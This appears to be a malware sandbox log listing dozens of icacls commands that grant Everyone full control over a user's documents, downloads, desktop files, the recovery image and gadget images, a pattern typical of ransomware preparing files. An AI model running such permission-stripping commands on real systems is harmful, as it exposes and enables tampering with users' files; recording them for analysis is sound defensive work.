C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSN Autos.url /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSN Entertainment.url /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSN Money.url /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSN Sports.url /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSN.url /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSNBC News.url /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Favorites\Microsoft Websites\IE Add-on site.url /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Favorites\Microsoft Websites\IE site on Microsoft.com.url /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Favorites\Microsoft Websites\Microsoft At Home.url /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Favorites\Microsoft Websites\Microsoft Store.url /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Favorites\Links for United States\GobiernoUSA.gov.url /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Favorites\Microsoft Websites\Microsoft At Work.url /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Favorites\Links for United States\USA.gov.url /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Favorites\Links\Suggested Sites.url /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Favorites\Links\Web Slice Gallery.url /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Downloads\AssertUnblock.mp2 /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Downloads\CompressCopy.3gp /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Downloads\ConvertToUnlock.css /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Downloads\DebugConfirm.3gpp /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Downloads\DenyConvertTo.ps1 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Downloads\DismountDebug.kix /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Downloads\ExpandSwitch.tif /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Downloads\FindBlock.pub /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Downloads\GetClose.otf /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Downloads\GroupSplit.mhtml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Downloads\MergeUninstall.rtf /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Downloads\NewConvertTo.wma /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Downloads\PingSend.ogg /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Downloads\ProtectLimit.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Downloads\ResetExport.mp2 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Downloads\ResetRead.emf /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Downloads\RestoreClose.rtf /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Downloads\RevokeGet.otf /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Downloads\RevokePublish.jpg /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Downloads\SuspendResize.css /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Downloads\TestDebug.mpeg /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Downloads\StepJoin.3gp2 /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Downloads\SaveResume.xltx /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Downloads\TestGrant.jpeg /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Downloads\UndoClear.wma /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Downloads\UninstallLock.bin /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Downloads\UninstallLock.dib /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Documents\AddApprove.txt /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Downloads\WriteFind.odt /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Documents\Are.docx /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Documents\CopySuspend.htm /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Documents\DebugAdd.ppsm /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Documents\DismountUndo.dotm /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Documents\ExitTrace.vstx /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Documents\ExpandReset.potm /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Documents\Files.docx /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Documents\MountInstall.ppsm /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Documents\Opened.docx /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Documents\PopMove.ppsx /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Documents\RedoUnregister.doc /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Documents\Recently.docx /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Documents\ProtectDeny.vsw /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Documents\RenameUndo.htm /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Documents\ResetRestore.rtf /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Documents\RevokeSend.docx /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Documents\SaveReset.xlsb /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Documents\SendDismount.vssx /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Documents\SkipCopy.xlsb /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Documents\SplitWatch.vssm /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Documents\StartLimit.potx /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Documents\These.docx /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Documents\UninstallMeasure.xla /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Documents\UnlockFind.xlt /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Desktop\AddUnregister.ppt /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Desktop\ConvertExpand.wmv /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Desktop\ConvertFromDisconnect.xps /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Desktop\ConvertFromDisconnect.xps /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Desktop\GetDismount.mpe /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Desktop\GetLock.pot /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Desktop\JoinConvertTo.htm /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Desktop\MoveEnter.pptm /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Desktop\ReadSuspend.easmx /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Desktop\MoveExpand.mpeg2 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Desktop\ResizeSend.pdf /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Desktop\SendTrace.pot /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Desktop\SkipSave.wav /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Desktop\SubmitEnable.vst /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Desktop\SubmitSend.contact /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Desktop\SuspendRegister.svgz /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Desktop\SwitchComplete.xps /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Desktop\UndoTest.snd /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Contacts\Admin.contact /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Recovery\34107922-98a6-11eb-a15f-ea91f6580701\Winre.wim /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\drag.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\icon.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\logo.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\1.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\10.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\11.png /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\12.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\13.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\14.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\15.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\16.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\17.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\18.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\19.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\1px.gif /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\2.png /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\20.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\21.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\22.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\23.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\26.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\27.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\25.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\24.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\28.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\29.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\3.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\30.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\31.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\32.png /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\33.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\36.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\35.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\34.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\37.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\38.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\39.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\4.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\40.png /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\41.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\42.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\44.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\43.png /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\45.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\46.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\47.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\5.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\6.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\7.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\8.png /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\9.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\activity16v.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\alertIcon.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_down.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_up.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_down_BIDI.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_down.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_over.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_down_BIDI.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_over_BIDI.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_up.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_over.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\divider-horizontal.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\divider-vertical.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_up_BIDI.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked-loading.png /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_cloudy.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_few-showers.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_foggy.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_hail.png /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-first-quarter.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-first-quarter_partly-cloudy.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-full.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-full_partly-cloudy.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-last-quarter.png /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-last-quarter_partly-cloudy.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-new.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-crescent.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-new_partly-cloudy.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-crescent_partly-cloudy.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-gibbous.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-gibbous_partly-cloudy.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waxing-crescent.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waxing-crescent_partly-cloudy.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waxing-gibbous.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waxing-gibbous_partly-cloudy.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_rainy.png /grant Everyone:F /T /C /Q2⤵
-
-
